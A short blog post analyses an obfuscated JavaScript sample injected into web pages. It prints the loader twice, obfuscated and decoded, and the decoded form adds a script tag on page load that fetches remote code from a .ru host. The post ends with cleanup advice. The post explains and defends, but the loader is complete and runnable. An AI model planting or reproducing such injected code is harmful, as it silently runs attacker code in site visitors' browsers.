Malware Attack, Reply Comment
I refer to the recent comment on my previous malware attack post from 1.5 years ago. Basically, the obscured script carried out a lot of substitutions to avoid any firewall filter.
Below is a sample my friend sent me 3 months ago.
/*GNU GPL*/ try{window.onload = function(){
    var Qq73s8yh02ptue2rq = document.createElement('s&(^c@#r$^i(@)p&@t($&'.replace(/#|\!|\(|&|@|\$|\^|\)/ig, ''));
    Qq73s8yh02ptue2rq.setAttribute('type', 'text/javascript');
    Qq73s8yh02ptue2rq.setAttribute('src', 'h!!t(#(t#)^p(^!(:&$/$$$/$@)&h!^c&3$6^))#^0&-@!&c!o$()m&^&.))g(l^((o)b&$#e&!)@7#^.!(c)##)o@)m#^.(@$k#(&)i^n$)#o^^@(-#)&$t@@^o)!.!@$^v)&i!@)e^#w&h$&o&&m)((e#s)$!a@$l^^e).$(r)^&u(:(((!8&^@0!!8)))0^/#!)f#@r!i&&!)e$n&d&f!$e&#e)$d)^.!c(^o)()^m^/@$f#(^!r#^@&@i(^e&n@(&(d$!f&!#e#!e@@$#@d).^!c#^^^o^@!!m)($/$b!l#u^^$^e&$@@#h@^o))&!s#@$$t&#.@@@c)^(&o@m()^/$(^v^^$#e#o$#h)(&.^$@c)(o^$)$m&/#g(!^o^^o!(^g@!&l!^#!^e&.&@c)!o)@&m!/(#!^^'.replace(/\$|\(|@|\!|\)|#|\^|&/ig, ''));
    Qq73s8yh02ptue2rq.setAttribute('defer', 'defer');
    Qq73s8yh02ptue2rq.setAttribute('id', 'U&!^(y&$2(#3^9#^b)$$x^#k#^@9##)5(&t#@'.replace(/&|\!|\)|\^|\(|\$|@|#/ig, ''));
    document.body.appendChild(Qq73s8yh02ptue2rq);
}} catch(e) {}
After it has been run through the browser's JavaScript interpreter, you get the version below. It dynamically creates a <script> element, and as soon as that element is appended to the page the browser fetches and runs the remote script automatically.
/*GNU GPL*/ try{window.onload = function(){
    var Qq73s8yh02ptue2rq = document.createElement('script');
    Qq73s8yh02ptue2rq.setAttribute('type', 'text/javascript');
    Qq73s8yh02ptue2rq.setAttribute('src', 'http://hc360-com.globe7.com.kino-to.viewhomesale.ru:8080/friendfeed.com/friendfeed.com/bluehost.com/veoh.com/google.com/');
    Qq73s8yh02ptue2rq.setAttribute('defer', 'defer');
    Qq73s8yh02ptue2rq.setAttribute('id', 'Uy239bxk95t');
    document.body.appendChild(Qq73s8yh02ptue2rq);
}} catch(e) {}
If your HTML/JS contains a window.onload handler that does not belong to your own code, you can apply the same trick and run 'sed' over the affected files to clean it up.